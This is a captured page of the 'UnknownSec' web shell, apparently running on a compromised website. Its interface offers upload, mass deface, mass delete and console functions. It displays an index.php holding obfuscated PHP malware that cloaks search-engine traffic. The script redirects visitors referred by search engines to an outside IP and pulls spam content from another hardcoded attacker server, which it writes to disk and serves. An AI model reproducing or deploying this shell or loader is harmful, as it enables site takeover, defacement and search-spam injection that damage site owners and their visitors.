shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
public
/
2bnclbdj
/ [
drwxrwxrwx
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto kL0Ur; Vgmxa: $apass2 = "\142\x32\x33\x68\x72\62\63\x76\162\x33\x32"; goto eYnzw; BvNps: $xx1 = 5; goto IOds9; ANbVj: if ($_GET["\x69\144"] == "\x69\156\x64\x65\170") { header("\114\x6f\143\x61\x74\151\x6f\156\72\x20\150\x74\164\x70\163\x3a\x2f\x2f\x67\157\157\147\x6c\x65\x2e\143\157\x6d"); die; } goto zpkXI; sTeQZ: $apass1 = "\x76\151\163\144\x6f\151\152\145\167"; goto A7XH4; ovCsU: if (strlen($text) < 5000) { $url = "\66\x35\56\61\x30\71\x2e\66\67\56\61\x30\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\51\74\x62\x72\x20\x2f\76\12"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\56\x70\x68\160\77\160\x61\x73\163\75{$apass}\46\x71\x3d{$_GET["\151\144"]}"; $out = "\x47\105\124\40{$req}\x20\110\x54\124\x50\57\61\x2e\60\xd\xa"; $out .= "\x48\157\163\x74\x3a\x20{$url}\15\12"; $out .= "\103\x6f\x6e\x6e\145\x63\x74\151\157\156\72\x20\x43\154\x6f\163\145\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto FLSFh; a8f0U: $apass3 = "\162\166\63\62\171\x64\141\143\x73\x76\x73\144\166"; goto gtvu0; hXEGF: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\x70\72\x2f\57\x36\x35\x2e\x31\60\x39\x2e\66\67\56\61\60\60\57" . $_GET["\146\x6e"] . "\x2e\160\150\160\77\160\141\163\163\75{$apass}\46\x71\75{$_GET["\x69\x64"]}"); } goto ovCsU; ray7C: $query_pars_2 = str_replace("\55", "\53", $_GET["\x69\144"]); goto i0YSJ; C5RxP: echo $text; goto laabG; zpkXI: $_GET["\167\157\162\x6c\x64"] = 5; goto yL0Cl; c8sQU: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto JIzxs; eYnzw: $s = dirname($_SERVER["\120\x48\x50\x5f\123\x45\114\x46"]); goto c8sQU; yL0Cl: $_GET["\146\x6e"] = "\x36\71\66\71\66\x39\156\x65\167"; goto sTeQZ; JIzxs: $s = $_SERVER["\123\x45\122\126\x45\122\x5f\x4e\101\115\x45"] . $s; goto a8f0U; IOds9: $keyword = str_replace("\55", "\40", $_GET["\x69\144"]); goto WPykX; WPykX: $keyword = str_replace("\40", "\x2b", $keyword); goto Vgmxa; TkB6O: if (function_exists("\x63\x75\162\x6c\137\151\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\x70\72\57\x2f\66\65\56\61\x30\71\x2e\66\x37\x2e\61\60\60\x2f" . $_GET["\146\x6e"] . "\56\x70\x68\x70\77\160\141\x73\x73\75{$apass}\46\161\x3d{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\x7a\x69\154\154\x61\57\x34\56\60\40\x28\x63\157\155\x70\x61\x74\x69\x62\x6c\x65\73\40\x4d\123\x49\105\40\66\56\x30\x3b\40\127\151\156\x64\157\x77\x73\40\x4e\124\40\65\x2e\x31\73\x20\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto hXEGF; FLSFh: if (strlen($text) > 500) { $out = fopen("\x69\x6e\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto C5RxP; kL0Ur: error_reporting(0); goto EH4fN; EH4fN: $today = "\x32\x30\62\66\60\x32\60\x34\x2d"; goto AuLZw; eew21: if ($_GET["\x69\x64"] == "\x74\145\x73\x74\151\156\147") { echo "\164\x65\163\x74\x20\147\x6f\x6f\x64\x2e\x2e\x2e"; die; } goto ANbVj; i0YSJ: $text = ''; goto TkB6O; AuLZw: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto eew21; d8vS3: if (strpos($_SERVER["\110\124\x54\x50\x5f\x52\x45\106\x45\122\x45\x52"], "\x67\157\157\147\x6c\x65\56") or strpos($_SERVER["\x48\124\x54\120\137\x52\105\x46\x45\x52\x45\122"], "\x79\x61\x68\x6f\157\56") or strpos($_SERVER["\x48\x54\124\x50\x5f\122\105\106\105\x52\x45\122"], "\x62\x69\x6e\x67\56")) { $tpl = "\151\x6e\144\145\x78\x2f" . $_GET["\x69\x64"] . "\x2e\x70\x68\160\x2e\164\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\x4c\x6f\143\x61\164\151\x6f\156\x3a\x20\150\x74\164\x70\x3a\x2f\57\x36\x35\56\61\x30\x38\56\x31\x30\x2e\x31\x39\71\57\x65\156\164\145\162\x2f\77\155\x61\162\x6b\75{$today}\55{$s}\x26\164\160\154\x3d{$tpl}\x26\145\156\x67\153\x65\171\75{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\x2e\160\x68\x70"; if (file_exists("\151\x6e\x64\145\x78\x2f" . $myname)) { $html = @file_get_contents("\151\x6e\x64\x65\x78\57" . $myname); if (strpos($_SERVER["\110\x54\x54\x50\x5f\x55\123\105\x52\x5f\101\107\105\x4e\x54"], "\x62\151\156\x67") > 2 or strpos($_SERVER["\x48\124\124\x50\137\125\123\105\x52\x5f\x41\x47\105\116\124"], "\171\x61\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\151\x64"]); $html = str_replace("\x3c\164\151\x74\154\x65\x3e\74\57\164\x69\164\x6c\145\x3e", "\74\164\151\x74\x6c\x65\x3e{$keyword}\x3c\57\x74\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto ray7C; gtvu0: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto d8vS3; A7XH4: $x1 = 3; goto BvNps; laabG: ?>
© 2026 UnknownSec